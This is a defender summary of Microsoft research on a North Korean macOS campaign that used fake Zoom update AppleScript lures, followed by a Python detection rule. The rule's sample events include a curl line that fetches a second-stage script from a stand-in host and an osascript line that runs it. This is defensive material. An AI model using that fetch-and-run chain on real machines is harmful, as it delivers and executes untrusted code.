Sapphire Sleet macOS Intrusion: Key Defender Insights
Summary
Microsoft Threat Intelligence detailed a macOS-focused campaign by Sapphire Sleet that uses social engineering and fake software updates instead of exploiting vulnerabilities. The attack chain relies on user-initiated AppleScript and Terminal execution to bypass native macOS protections, making layered defenses, user awareness, and endpoint detection especially important.
Introduction
Microsoft has published new research on a macOS intrusion campaign tied to Sapphire Sleet, a North Korean threat actor known for targeting cryptocurrency and finance organizations. The report matters because it shows how attackers can compromise Macs without using a software exploit—simply by convincing users to run what appears to be a legitimate update.
What’s new in this campaign
Microsoft observed Sapphire Sleet using a fake Zoom SDK Update.scpt file to start a multi-stage infection chain on macOS.
Key techniques highlighted
- Social engineering over exploits: The campaign depends on users manually opening and running a malicious AppleScript file.
- Trusted app abuse: The lure opens in macOS Script Editor, a legitimate Apple application, which helps the activity appear benign.
- Multi-stage payload delivery: The script uses curl and osascript to fetch and run additional AppleScript payloads from attacker-controlled infrastructure.
- Credential theft and persistence: Later stages harvest passwords, target cryptocurrency assets, manipulate TCC-related behavior, establish persistence, and exfiltrate sensitive data.
- Decoy update workflow: The malicious script includes fake update instructions and launches trusted system tools to reinforce legitimacy.
Microsoft noted this attack chain can operate outside normal macOS security enforcement boundaries when execution is user-initiated, reducing the effectiveness of controls such as Gatekeeper, notarization checks, quarantine enforcement, and parts of the Transparency, Consent, and Control framework.
Why this matters for defenders
For IT and security teams, the main takeaway is that macOS users remain highly vulnerable to convincing lures, especially in high-value sectors like cryptocurrency, venture capital, finance, and blockchain. The campaign also shows that attackers are increasingly combining legitimate macOS utilities with staged payload delivery to avoid raising suspicion.
Organizations using Microsoft Defender should review Microsoft’s newly published detections, hunting guidance, and indicators of compromise for this activity. Cross-platform visibility is essential, particularly for environments that have historically treated Macs as lower-risk endpoints.
Recommended next steps
- Educate users to avoid running unexpected update files, especially .scpt files or scripts delivered outside official channels.
- Keep macOS up to date with Apple’s latest protections and security updates.
- Review endpoint detections for suspicious use of Script Editor, osascript, and curl in sequence.
- Hunt for fake update activity and abnormal AppleScript execution tied to external downloads.
- Prioritize high-risk users in finance, crypto, and executive roles for stronger monitoring and phishing-resistant controls.
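The two detection steps above (Script Editor, osascript and curl in sequence; AppleScript execution tied to an external download) can be turned into a simple correlation rule over process-start telemetry. The following is an added example written for this summary, not code from Microsoft's report or any Defender query: it parses a constructed set of process events (field layout, hostnames, paths and the .invalid URLs are all assumptions), and for each curl that fetches a URL it looks for an AppleScript runner shortly before and another osascript run shortly after on the same host and user. If the file curl wrote is the one osascript later executes, the finding is raised to high severity.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample process-start events (not real telemetry).
# Fields: timestamp | host | user | process | parent process | command line
SAMPLE_EVENTS = """\
2025-01-10T09:00:01Z|mac-01|alice|Script Editor|launchd|Script Editor /Users/alice/Downloads/Zoom SDK Update.scpt
2025-01-10T09:00:20Z|mac-01|alice|osascript|Script Editor|osascript /Users/alice/Downloads/Zoom SDK Update.scpt
2025-01-10T09:00:22Z|mac-01|alice|curl|osascript|curl -s https://updates.example.invalid/stage2.scpt -o /tmp/.zoom_update.scpt
2025-01-10T09:00:25Z|mac-01|alice|osascript|osascript|osascript /tmp/.zoom_update.scpt
2025-01-10T09:30:00Z|mac-02|bob|curl|Terminal|curl -s https://api.example.invalid/health
2025-01-10T09:31:00Z|mac-02|bob|osascript|Terminal|osascript -e display notification "done"
2025-01-10T14:00:00Z|mac-03|carol|osascript|Terminal|osascript /Users/carol/scripts/backup.scpt
"""

WINDOW = timedelta(minutes=5)                  # assumed correlation window
SCRIPT_RUNNERS = {"Script Editor", "osascript"}  # AppleScript execution surfaces
URL_RE = re.compile(r"https?://\S+")
CURL_OUT_RE = re.compile(r"(?:-o|--output)\s+(\S+)")


@dataclass
class ProcEvent:
    ts: datetime
    host: str
    user: str
    process: str
    parent: str
    cmdline: str


def parse_events(text):
    """Parse pipe-delimited process events and return them sorted by time."""
    events = []
    for line in text.strip().splitlines():
        ts, host, user, proc, parent, cmd = line.split("|", 5)
        when = datetime.fromisoformat(ts.replace("Z", "+00:00"))
        events.append(ProcEvent(when, host, user, proc, parent, cmd))
    events.sort(key=lambda e: e.ts)
    return events


def find_script_fetch_chains(events, window=WINDOW):
    """Flag curl fetches bracketed by AppleScript execution on the same host/user.

    Sequence looked for: [Script Editor | osascript] -> curl <URL> -> osascript,
    all within `window`. A plain curl followed by osascript (mac-02) is not enough;
    nor is osascript alone (mac-03).
    """
    by_key = {}
    for e in events:
        by_key.setdefault((e.host, e.user), []).append(e)

    findings = []
    for (host, user), evs in by_key.items():
        for j, fetch in enumerate(evs):
            if fetch.process != "curl":
                continue
            url = URL_RE.search(fetch.cmdline)
            if not url:
                continue
            # AppleScript runners shortly before the fetch (earliest first)
            before = [e for e in evs[:j]
                      if e.process in SCRIPT_RUNNERS and fetch.ts - e.ts <= window]
            # osascript runs shortly after the fetch
            after = [e for e in evs[j + 1:]
                     if e.process == "osascript" and e.ts - fetch.ts <= window]
            if not before or not after:
                continue
            out = CURL_OUT_RE.search(fetch.cmdline)
            fetched_path = out.group(1) if out else None
            # Strongest signal: the downloaded file is what osascript then runs
            executed_fetched = bool(fetched_path) and any(
                fetched_path in e.cmdline for e in after)
            findings.append({
                "host": host,
                "user": user,
                "lure": before[0].cmdline,
                "url": url.group(0),
                "fetched_path": fetched_path,
                "fetched_file_executed": executed_fetched,
                "severity": "high" if executed_fetched else "medium",
            })
    return findings


if __name__ == "__main__":
    for f in find_script_fetch_chains(parse_events(SAMPLE_EVENTS)):
        print(f"[{f['severity']}] {f['host']}/{f['user']}: {f['lure']!r} "
              f"fetched {f['url']} -> {f['fetched_path']} "
              f"(executed={f['fetched_file_executed']})")
```

On the constructed data only mac-01 is flagged: a Script Editor launch of a .scpt from Downloads, a curl to an external URL, and osascript executing the file curl wrote. The window and the "before/after" requirement are what keep ordinary developer use of curl and osascript (mac-02, mac-03) out of the results; in a real environment, tune the window to your telemetry cadence and add the parent-process field to the finding so analysts can see the Script Editor to osascript to curl lineage directly.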
This research is a reminder that modern macOS attacks often succeed through persuasion, not exploitation. Security teams should combine user awareness, endpoint monitoring, and layered defense controls to reduce exposure.